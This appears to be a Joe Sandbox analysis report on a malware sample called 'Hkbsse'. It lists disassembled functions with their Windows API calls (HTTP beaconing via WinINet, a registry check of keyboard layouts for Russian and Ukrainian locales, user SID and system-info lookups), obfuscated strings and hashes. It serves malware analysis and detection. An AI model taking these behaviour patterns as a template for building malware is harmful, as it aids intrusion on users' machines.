Opcode Fuzzy Hash: 76a6212b35acff8ee94f0a8a10e1b2dd73c8d5c00f8bbe7855719f724e8cc63e
Instruction Fuzzy Hash: 94F236B1D041588BEB29CB28CD8979DBBB69B92304F5481D8E049AB2C2DB795FC4CF51

Function 00B9BD30 Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 304
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00BE8D20,00000000,00000000,00000000,00000000), ref: 00B9BDBC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B9BDE0
HttpOpenRequestA.WININET(?,00000000), ref: 00B9BE2A
HttpSendRequestA.WININET(?,00000000), ref: 00B9BEEA
InternetReadFile.WININET(?,?,000003FF,?), ref: 00B9BF9C
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 00B9C050
InternetCloseHandle.WININET(?), ref: 00B9C077
InternetCloseHandle.WININET(?), ref: 00B9C07F
InternetCloseHandle.WININET(?), ref: 00B9C087

Strings

invalid stoi argument, xrefs: 00B9E3D4
stoi argument out of range, xrefs: 00B9E3CA
dwWQ8wK CDc=, xrefs: 00B9C355
XtdJQp==, xrefs: 00B9BE03
dwWQ8smzCB==, xrefs: 00B9C2BB, 00B9C513
/!8, xrefs: 00B9C8A7, 00B9C8AA
/!8, xrefs: 00B9B904, 00B9BD47, 00B9C267, 00B9CD4B, 00B9DC0F
/!8, xrefs: 00B9C841

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: /!8$/!8$/!8$XtdJQp==$dwWQ8smzCB==$dwWQ8wK CDc=$invalid stoi argument$stoi argument out of range
API String ID: 1354133546-490260837
Opcode ID: dfba83484f57ef9df7c17bd051d680c9066e0ff38d14cb7ba8db8493bd9e811a
Instruction ID: 41c6ac5815681420b5fd571547ca44b02e258d65c12187f33afc2d78780903ad
Opcode Fuzzy Hash: dfba83484f57ef9df7c17bd051d680c9066e0ff38d14cb7ba8db8493bd9e811a
Instruction Fuzzy Hash: 4EB1C1B1A101589BDF28DF28CC88BADBBB9EF45304F5041E8F50997291DB759AC0CF94

Function 00B95DD0 Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 358
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00B95E03
RegCloseKey.ADVAPI32(80000001), ref: 00B95E3A

Strings

00000423, xrefs: 00B95FEA
/!8, xrefs: 00B95CA8, 00B95CF0, 00B95CE4, 00B95CB5, 00B95DD0
00000419, xrefs: 00B95F88
Keyboard Layout\Preload, xrefs: 00B95F44
0000043f, xrefs: 00B9601B
00000422, xrefs: 00B95FB9
/!8, xrefs: 00B958E4, 00B95B14, 00B95C57, 00B95DD6, 00B95F2B, 00B965A7, 00B9705C

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: /!8$/!8$00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 47109696-2471982102
Opcode ID: 5b4b5b6200866c399231c83a3a81802c5f8ab4309c4761ebb84ed92e2699ea30
Instruction ID: c0dd70d91eb0f4bbeb8948ab56290fd808f1d119ba361851059dfd508597c20b
Opcode Fuzzy Hash: 5b4b5b6200866c399231c83a3a81802c5f8ab4309c4761ebb84ed92e2699ea30
Instruction Fuzzy Hash: 25E1BC71904258AFDF25DBA4CC89BDEB7B9EB14300F5042E9E409A7292DB74ABC4CF51

Function 00BD195C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BD1615: CreateFileW.KERNEL32(00000000,00000000,?,00BD1A05,?,?,00000000,?,00BD1A05,00000000,0000000C), ref: 00BD1632

GetLastError.KERNEL32 ref: 00BD1A70
__dosmaperr.LIBCMT ref: 00BD1A77
GetFileType.KERNEL32(00000000), ref: 00BD1A83
GetLastError.KERNEL32 ref: 00BD1A8D
__dosmaperr.LIBCMT ref: 00BD1A96
CloseHandle.KERNEL32(00000000), ref: 00BD1AB6
CloseHandle.KERNEL32(00BCAB32), ref: 00BD1C03
GetLastError.KERNEL32 ref: 00BD1C35
__dosmaperr.LIBCMT ref: 00BD1C3C

Strings

H, xrefs: 00BD1BC1

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 0063c4d9aaaf2b4a9f271b7d6d142363cddf3114ba6493bffce3b095e7e3d547
Instruction ID: 02744b3989238be4ae825f4bbdb07f1bc7506cd38ab3948f6e45838417ee584f
Opcode Fuzzy Hash: 0063c4d9aaaf2b4a9f271b7d6d142363cddf3114ba6493bffce3b095e7e3d547
Instruction Fuzzy Hash: 3AA11632A14145AFCF19DF6CD895BADBBE1EB06324F18059EF811AF391EB348912CB51

Function 00B97CE0 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,38EB212F), ref: 00B97D5A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B97DBB
GetProcAddress.KERNEL32(00000000), ref: 00B97DC2
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B97E83
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B97E87

Strings

P9FnI6==, xrefs: 00B98192
P9FnJF==, xrefs: 00B98042
P9FoH6==, xrefs: 00B980EA
/!8, xrefs: 00B97D0B

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID: /!8$P9FnI6==$P9FnJF==$P9FoH6==
API String ID: 374719553-2028337603
Opcode ID: 48277dbaba69c93ee70c89912b6a8bce3c38847a9d9f460f0ded0cc916148d47
Instruction ID: ec2d70481f2a4fbeb342458264277759089a46124b9ec2830676b96745f6138d
Opcode Fuzzy Hash: 48277dbaba69c93ee70c89912b6a8bce3c38847a9d9f460f0ded0cc916148d47
Instruction Fuzzy Hash: 01D1E670E446449BDF24AB28DC4B7AD7BF1AB46310F9442E8E405AB3C2DF744E848BD2

Function 00B96590 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00B965EA
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00B96630
GetSidIdentifierAuthority.ADVAPI32(?), ref: 00B9663D
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B96751
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00B96778

Strings

MH6i9F==, xrefs: 00B966D8
OH0i9F==, xrefs: 00B96781
Xn5b7wSx, xrefs: 00B9664C
/!8, xrefs: 00B958E4, 00B95B14, 00B95DD6, 00B95F2B, 00B965A7, 00B9705C

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Authority$Name$AccountCountIdentifierLookupUser
String ID: /!8$MH6i9F==$OH0i9F==$Xn5b7wSx
API String ID: 4230999276-3075362938
Opcode ID: 8455453eacd4848242e4dc720a9ca1c635f1abbe24d7e07ce90b68cc18f59038
Instruction ID: eeee9331093397a0c15bcd3e2a90dbf1c8e753b220875f61e1f6caa484a15a31
Opcode Fuzzy Hash: 8455453eacd4848242e4dc720a9ca1c635f1abbe24d7e07ce90b68cc18f59038
Instruction Fuzzy Hash: FA91CFB19001189BDF29DB28CC85BEDB7B9EB49304F4045F9E50997292DA749FC8CFA4

Function 00BD23B7 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 373
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00BD2439
_free.LIBCMT ref: 00BD245D
_free.LIBCMT ref: 00BD25EA
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE6748), ref: 00BD25FC
_free.LIBCMT ref: 00BD27B6

Strings

Eastern Standard Time, xrefs: 00BD266B
Eastern Summer Time, xrefs: 00BD269A
/!8, xrefs: 00BD26F8

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: /!8$Eastern Standard Time$Eastern Summer Time
API String ID: 597776487-3826212033
Opcode ID: 18d5a6478771a56c750a93cf3a416bea9705ef724955c2111626919c3f91d92f
Instruction ID: f2e2b581f8e241927abf84f5a6a30465f6e8e57484e33ef91ac36c9e8447fc8d
Opcode Fuzzy Hash: 18d5a6478771a56c750a93cf3a416bea9705ef724955c2111626919c3f91d92f
Instruction Fuzzy Hash: ECC12675900289ABDB249F78DC91BAAFBE9EF65314F1444DBE89597381FB308E01CB50

Function 00BD2592 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 171
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE6748), ref: 00BD25FC
_free.LIBCMT ref: 00BD25EA

Part of subcall function 00BCAC95: HeapFree.KERNEL32(00000000,00000000,?,00BCEF6D,?,00000000,?,?,?,00BCEF94,?,00000007,?,?,00BCF396,?), ref: 00BCACAB
Part of subcall function 00BCAC95: GetLastError.KERNEL32(?,?,00BCEF6D,?,00000000,?,?,?,00BCEF94,?,00000007,?,?,00BCF396,?,?), ref: 00BCACBD

_free.LIBCMT ref: 00BD27B6

Strings

Eastern Standard Time, xrefs: 00BD266B
Eastern Summer Time, xrefs: 00BD269A
/!8, xrefs: 00BD26F8

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: /!8$Eastern Standard Time$Eastern Summer Time
API String ID: 2155170405-3826212033
Opcode ID: 0298e569b85edb81f41048b1e700ff5ecd6979151535002edc11cc50aa473dbf
Instruction ID: e9c252dd0e362e5af42d27317c674a9cc97fcc1e5c8517d1030c12dcd573450d
Opcode Fuzzy Hash: 0298e569b85edb81f41048b1e700ff5ecd6979151535002edc11cc50aa473dbf
Instruction Fuzzy Hash: D451B671900349ABCB24AF689C819BAF7F8EF64350B1046EBE96597391FB70DE41CB50

Function 00B98290 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 155
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,?,38EB212F), ref: 00B98309
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B98370
GetProcAddress.KERNEL32(00000000), ref: 00B98377
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B98434

Strings

/!8, xrefs: 00B982BB

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID: /!8
API String ID: 2167034304-2196672732
Opcode ID: 18df6a3ba92f5a59e2c7ac570a9fe111db7e862946ac8b9955a4c2918139dc0d
Instruction ID: 99a655c5660bb63260349b526980bfb10c0c18f6ee6918a7f89c3ea5f005896a
Opcode Fuzzy Hash: 18df6a3ba92f5a59e2c7ac570a9fe111db7e862946ac8b9955a4c2918139dc0d
Instruction Fuzzy Hash: 755115719142489BDF14EB78CD897EDBBB4EF46310F5042E8E809A7391EF749A808B91

Function 00BC6DE1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141
pipeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00BC6E03
GetFileInformationByHandle.KERNEL32(?,?), ref: 00BC6E5D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00BC6D13,?,000000FF), ref: 00BC6EEB
__dosmaperr.LIBCMT ref: 00BC6EF2
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00BC6F2F

Part of subcall function 00BC7157: __dosmaperr.LIBCMT ref: 00BC718C

Strings

/!8, xrefs: 00BC6DE9

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID: /!8
API String ID: 1206951868-2196672732
Opcode ID: b8faa0ec09698cf6cd16f26de1aadc99d842a26ce3d05c69f2260bf5a3d4e4df
Instruction ID: 8272bc00c234664470f9a72e3f5dee48f47cc2f3e19d67d7b86317421cd7957f
Opcode Fuzzy Hash: b8faa0ec09698cf6cd16f26de1aadc99d842a26ce3d05c69f2260bf5a3d4e4df
Instruction Fuzzy Hash: 4B414B75900645ABDB24EFB5EC85EABBBF9EF88300B10446EF956D7610EB30D844CB61

Function 00B97540 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064,38EB212F,?,00000000,00BD8F98,000000FF), ref: 00B9757C
__Init_thread_footer.LIBCMT ref: 00B97609

Part of subcall function 00BACFCD: RtlEnterCriticalSection.NTDLL(00BF5690), ref: 00BACFD7
Part of subcall function 00BACFCD: RtlLeaveCriticalSection.NTDLL(00BF5690), ref: 00BAD00A
Part of subcall function 00BACFCD: RtlWakeAllConditionVariable.NTDLL ref: 00BAD081

CreateThread.KERNEL32(00000000,00000000,00B973E0,00BF8578,00000000,00000000), ref: 00B9766E
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B97679

Part of subcall function 00BAD017: RtlEnterCriticalSection.NTDLL(00BF5690), ref: 00BAD022
Part of subcall function 00BAD017: RtlLeaveCriticalSection.NTDLL(00BF5690), ref: 00BAD05F

Strings

/!8, xrefs: 00B97552

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
String ID: /!8
API String ID: 4065365256-2196672732
Opcode ID: 81fe3eb20a8abc6a7fb9feb5dc91947ee34d74dc46f72f72115aaf8dfc942a35
Instruction ID: 1cd26c273411145e87ccbd487ff017a44eaf00a006ed0c8b214daeb3e08921b8
Opcode Fuzzy Hash: 81fe3eb20a8abc6a7fb9feb5dc91947ee34d74dc46f72f72115aaf8dfc942a35
Instruction Fuzzy Hash: D551C171658248AFEF04DF28DC85BAD7BE1EB55304F1046A9F9018B3D1DF7A9984CB50

Function 00B9B8F0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 130COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B9B957

Strings

dwWQ8wK CDc=, xrefs: 00B9C355
XtdJQp==, xrefs: 00B9BE03
dwWQ8smzCB==, xrefs: 00B9C2BB, 00B9C513
/!8, xrefs: 00B9B904, 00B9BD47, 00B9C267

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: /!8$XtdJQp==$dwWQ8smzCB==$dwWQ8wK CDc=
API String ID: 2538663250-4220570565
Opcode ID: 891abef5e8dc00f6c5e3530245c55733a269e6073d1d0280f4f6ca3d10f20485
Instruction ID: a1e6c035409e8d01f37abff6fa7468aae4ec21adf2522136fd9c9d04f8ddf206
Opcode Fuzzy Hash: 891abef5e8dc00f6c5e3530245c55733a269e6073d1d0280f4f6ca3d10f20485
Instruction Fuzzy Hash: D8416D71A101489FDF04DF68D989FAEBBF9EB49714F1081ACE505EB690DB74A940CBA0

Function 00B99490 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,38EB212F,?,00000000), ref: 00B994DF

Strings

, xrefs: 00B99972
0p==, xrefs: 00B99565
/!8, xrefs: 00B994A7, 00B99927

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /!8$0p==$
API String ID: 514040917-377122891
Opcode ID: 820aa65ab4745861fb4ad096529e2db0d6ab42d572c67b9f927e958eeb5d7266
Instruction ID: 6758528befea5b0a41ef66a8da9b3172bc6695987631527dee335489d476a815
Opcode Fuzzy Hash: 820aa65ab4745861fb4ad096529e2db0d6ab42d572c67b9f927e958eeb5d7266
Instruction Fuzzy Hash: AA918F31A141188BDF29CF28CC85BEDB7B6EB86300F1081E9E409A7291DB759EC4CF90

Function 00BD26ED Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BD2760
_free.LIBCMT ref: 00BD27B6

Part of subcall function 00BD2592: _free.LIBCMT ref: 00BD25EA
Part of subcall function 00BD2592: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE6748), ref: 00BD25FC

Strings

/!8, xrefs: 00BD26F8

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: /!8
API String ID: 597776487-2196672732
Opcode ID: fe3e63b9a9fff7d9036e10994bb4ee0d56afc5bf174730c949163103f7550f17
Instruction ID: 2959da8692dbd9e92494f30a2b906596fddffbe938c5eb8168a3138e235430e1
Opcode Fuzzy Hash: fe3e63b9a9fff7d9036e10994bb4ee0d56afc5bf174730c949163103f7550f17
Instruction Fuzzy Hash: CA21D8328001AD67CB35A7349DC1EEAF7E8DBA1364F1002D7E8A5A7291FF705D85C591

Function 00B9E510 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 374sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA7840: __Cnd_destroy_in_situ.LIBCPMT ref: 00BA7938
Part of subcall function 00BA7840: __Mtx_destroy_in_situ.LIBCPMT ref: 00BA7941

Part of subcall function 00B9BD30: InternetOpenW.WININET(00BE8D20,00000000,00000000,00000000,00000000), ref: 00B9BDBC
Part of subcall function 00B9BD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B9BDE0
Part of subcall function 00B9BD30: HttpOpenRequestA.WININET(?,00000000), ref: 00B9BE2A

Sleep.KERNEL32(00001388), ref: 00B9E731

Strings

Mc0k6MOc, xrefs: 00B9E44F
SvR+, xrefs: 00B9E704
SF==, xrefs: 00B9E475

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

